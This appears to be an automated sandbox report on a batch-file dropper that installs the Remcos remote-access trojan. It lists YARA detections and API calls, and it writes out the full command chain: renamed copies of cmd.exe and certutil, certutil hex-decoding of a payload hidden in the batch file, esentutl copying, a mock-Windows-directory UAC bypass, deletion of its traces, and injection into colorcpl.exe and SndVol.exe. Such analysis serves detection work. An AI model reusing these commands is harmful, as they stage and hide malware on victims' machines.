Source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: colorcpl.exe PID: 7088, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: SndVol.exe PID: 3848, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.bank.troj.spyw.expl.evad.winBAT@55/22@240/3

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF7823D32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,

3_2_00007FF7823D32B0

Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,	6_2_00007FF6A2AA826C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	19_2_0041798D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F586C4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	19_2_06F586C4

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF7823FFB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,

3_2_00007FF7823FFB54

Source: C:\Users\Public\Libraries\AnyDesk.PIF

Code function: 9_2_02ABAD98 CreateToolhelp32Snapshot,

9_2_02ABAD98

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF6A2AB04A0 CLSIDFromProgID,CoCreateInstance,#358,#358,#360,#357,#359,

6_2_00007FF6A2AB04A0

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF6A2A86320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError,

6_2_00007FF6A2A86320

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 19_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

19_2_0041AADB

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\alpha.exe

Jump to behavior

Source: C:\Windows\SysWOW64\SndVol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
Source: C:\Windows\SysWOW64\colorcpl.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-B5YX7T

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\saw.bat" "

Source: C:\Users\Public\Libraries\AnyDesk.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\saw.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\boiaiyuP.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Puyiaiob.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: unknown	Process created: C:\Users\Public\Libraries\Puyiaiob.PIF "C:\Users\Public\Libraries\Puyiaiob.PIF"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: unknown	Process created: C:\Users\Public\Libraries\Puyiaiob.PIF "C:\Users\Public\Libraries\Puyiaiob.PIF"
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\boiaiyuP.cmd" "	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Puyiaiob.PIF /o	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Puyiaiob.PIF /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netapi32.dll	Jump to behavior
